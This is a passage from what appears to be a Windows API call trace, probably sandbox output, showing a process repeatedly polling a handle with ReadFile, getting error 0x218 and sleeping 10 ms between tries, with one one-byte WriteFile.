	[0213.814] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.814] GetLastError () returned 0x218
	[0213.815] Sleep (dwMilliseconds=0xa) 
	[0213.830] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.830] GetLastError () returned 0x218
	[0213.830] Sleep (dwMilliseconds=0xa) 
	[0213.846] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.846] GetLastError () returned 0x218
	[0213.846] Sleep (dwMilliseconds=0xa) 
	[0213.861] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.861] GetLastError () returned 0x218
	[0213.861] Sleep (dwMilliseconds=0xa) 
	[0213.877] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.877] GetLastError () returned 0x218
	[0213.877] Sleep (dwMilliseconds=0xa) 
	[0213.893] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.893] GetLastError () returned 0x218
	[0213.893] Sleep (dwMilliseconds=0xa) 
	[0213.927] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.927] GetLastError () returned 0x218
	[0213.927] Sleep (dwMilliseconds=0xa) 
	[0213.970] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0213.970] GetLastError () returned 0x218
	[0213.971] Sleep (dwMilliseconds=0xa) 
	[0214.018] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0214.018] GetLastError () returned 0x218
	[0214.018] Sleep (dwMilliseconds=0xa) 
	[0214.039] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0214.039] GetLastError () returned 0x218
	[0214.039] Sleep (dwMilliseconds=0xa) 
	[0214.048] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0214.048] GetLastError () returned 0x218
	[0214.048] Sleep (dwMilliseconds=0xa) 
	[0214.064] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0214.064] GetLastError () returned 0x218
	[0214.064] Sleep (dwMilliseconds=0xa) 
	[0214.080] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0214.080] GetLastError () returned 0x218
	[0214.080] Sleep (dwMilliseconds=0xa) 
	[0214.095] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0214.095] GetLastError () returned 0x218
	[0214.096] Sleep (dwMilliseconds=0xa) 
	[0214.112] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0214.112] GetLastError () returned 0x218
	[0214.112] Sleep (dwMilliseconds=0xa) 
	[0214.127] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0214.127] GetLastError () returned 0x218
	[0214.128] Sleep (dwMilliseconds=0xa) 
	[0214.142] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0214.142] GetLastError () returned 0x218
	[0214.143] Sleep (dwMilliseconds=0xa) 
	[0214.220] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0214.220] GetLastError () returned 0x218
	[0214.220] Sleep (dwMilliseconds=0xa) 
	[0214.267] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0214.267] GetLastError () returned 0x218
	[0214.267] Sleep (dwMilliseconds=0xa) 
	[0214.296] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0214.296] GetLastError () returned 0x218
	[0214.296] Sleep (dwMilliseconds=0xa) 
	[0214.298] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0214.298] GetLastError () returned 0x218
	[0214.298] Sleep (dwMilliseconds=0xa) 
	[0214.314] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0214.314] GetLastError () returned 0x218
	[0214.314] Sleep (dwMilliseconds=0xa) 
	[0214.331] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0214.331] GetLastError () returned 0x218
	[0214.331] Sleep (dwMilliseconds=0xa) 
	[0214.345] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0214.345] GetLastError () returned 0x218
	[0214.345] Sleep (dwMilliseconds=0xa) 
	[0214.360] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0214.360] GetLastError () returned 0x218
	[0214.360] Sleep (dwMilliseconds=0xa) 
	[0214.378] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0214.378] GetLastError () returned 0x218
	[0214.378] Sleep (dwMilliseconds=0xa) 
	[0214.392] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0214.392] GetLastError () returned 0x218
	[0214.392] Sleep (dwMilliseconds=0xa) 
	[0214.470] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0214.470] GetLastError () returned 0x218
	[0214.470] Sleep (dwMilliseconds=0xa) 
	[0214.563] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0214.563] GetLastError () returned 0x218
	[0214.564] Sleep (dwMilliseconds=0xa) 
	[0214.641] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0214.641] GetLastError () returned 0x218
	[0214.641] Sleep (dwMilliseconds=0xa) 
	[0214.688] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0214.688] GetLastError () returned 0x218
	[0214.688] Sleep (dwMilliseconds=0xa) 
	[0214.868] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0214.870] GetLastError () returned 0x218
	[0215.014] Sleep (dwMilliseconds=0x3e8) 
	[0216.139] WriteFile (in: hFile=0x258, lpBuffer=0x116f4dc, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x116f4d4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x116f4d4, lpOverlapped=0x0) returned 0
	[0216.139] Sleep (dwMilliseconds=0xa) 
	[0216.160] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.160] GetLastError () returned 0x218
	[0216.160] Sleep (dwMilliseconds=0xa) 
	[0216.170] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.170] GetLastError () returned 0x218
	[0216.170] Sleep (dwMilliseconds=0xa) 
	[0216.186] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.186] GetLastError () returned 0x218
	[0216.186] Sleep (dwMilliseconds=0xa) 
	[0216.201] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.201] GetLastError () returned 0x218
	[0216.201] Sleep (dwMilliseconds=0xa) 
	[0216.217] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.217] GetLastError () returned 0x218
	[0216.217] Sleep (dwMilliseconds=0xa) 
	[0216.233] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.233] GetLastError () returned 0x218
	[0216.233] Sleep (dwMilliseconds=0xa) 
	[0216.248] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.248] GetLastError () returned 0x218
	[0216.248] Sleep (dwMilliseconds=0xa) 
	[0216.270] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.270] GetLastError () returned 0x218
	[0216.270] Sleep (dwMilliseconds=0xa) 
	[0216.310] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.310] GetLastError () returned 0x218
	[0216.310] Sleep (dwMilliseconds=0xa) 
	[0216.357] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.357] GetLastError () returned 0x218
	[0216.357] Sleep (dwMilliseconds=0xa) 
	[0216.383] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.383] GetLastError () returned 0x218
	[0216.383] Sleep (dwMilliseconds=0xa) 
	[0216.388] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.388] GetLastError () returned 0x218
	[0216.388] Sleep (dwMilliseconds=0xa) 
	[0216.404] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.404] GetLastError () returned 0x218
	[0216.404] Sleep (dwMilliseconds=0xa) 
	[0216.419] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.420] GetLastError () returned 0x218
	[0216.420] Sleep (dwMilliseconds=0xa) 
	[0216.435] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.436] GetLastError () returned 0x218
	[0216.436] Sleep (dwMilliseconds=0xa) 
	[0216.452] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.452] GetLastError () returned 0x218
	[0216.453] Sleep (dwMilliseconds=0xa) 
	[0216.466] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.466] GetLastError () returned 0x218
	[0216.467] Sleep (dwMilliseconds=0xa) 
	[0216.482] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.482] GetLastError () returned 0x218
	[0216.482] Sleep (dwMilliseconds=0xa) 
	[0216.529] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.529] GetLastError () returned 0x218
	[0216.529] Sleep (dwMilliseconds=0xa) 
	[0216.575] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.575] GetLastError () returned 0x218
	[0216.575] Sleep (dwMilliseconds=0xa) 
	[0216.604] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.604] GetLastError () returned 0x218
	[0216.604] Sleep (dwMilliseconds=0xa) 
	[0216.607] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.607] GetLastError () returned 0x218
	[0216.607] Sleep (dwMilliseconds=0xa) 
	[0216.623] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.623] GetLastError () returned 0x218
	[0216.623] Sleep (dwMilliseconds=0xa) 
	[0216.638] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.638] GetLastError () returned 0x218
	[0216.638] Sleep (dwMilliseconds=0xa) 
	[0216.654] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.654] GetLastError () returned 0x218
	[0216.654] Sleep (dwMilliseconds=0xa) 
	[0216.670] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.670] GetLastError () returned 0x218
	[0216.670] Sleep (dwMilliseconds=0xa) 
	[0216.685] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.685] GetLastError () returned 0x218
	[0216.685] Sleep (dwMilliseconds=0xa) 
	[0216.732] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.732] GetLastError () returned 0x218
	[0216.732] Sleep (dwMilliseconds=0xa) 
	[0216.779] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.779] GetLastError () returned 0x218
	[0216.779] Sleep (dwMilliseconds=0xa) 
	[0216.802] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.802] GetLastError () returned 0x218
	[0216.802] Sleep (dwMilliseconds=0xa) 
	[0216.810] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.810] GetLastError () returned 0x218
	[0216.810] Sleep (dwMilliseconds=0xa) 
	[0216.840] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.840] GetLastError () returned 0x218
	[0216.840] Sleep (dwMilliseconds=0xa) 
	[0216.841] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.841] GetLastError () returned 0x218
	[0216.841] Sleep (dwMilliseconds=0xa) 
	[0216.856] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.856] GetLastError () returned 0x218
	[0216.856] Sleep (dwMilliseconds=0xa) 
	[0216.872] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.872] GetLastError () returned 0x218
	[0216.872] Sleep (dwMilliseconds=0xa) 
	[0216.888] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.889] GetLastError () returned 0x218
	[0216.889] Sleep (dwMilliseconds=0xa) 
	[0216.903] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.903] GetLastError () returned 0x218
	[0216.903] Sleep (dwMilliseconds=0xa) 
	[0216.950] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0216.950] GetLastError () returned 0x218
	[0216.950] Sleep (dwMilliseconds=0xa) 
	[0217.028] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0217.028] GetLastError () returned 0x218
	[0217.028] Sleep (dwMilliseconds=0xa) 
	[0217.094] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0217.094] GetLastError () returned 0x218
	[0217.094] Sleep (dwMilliseconds=0xa) 
	[0217.137] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0217.137] GetLastError () returned 0x218
	[0217.137] Sleep (dwMilliseconds=0xa) 
	[0218.705] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0218.705] GetLastError () returned 0x218
	[0218.705] Sleep (dwMilliseconds=0xa) 
	[0218.744] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0218.744] GetLastError () returned 0x218
	[0218.744] Sleep (dwMilliseconds=0xa) 
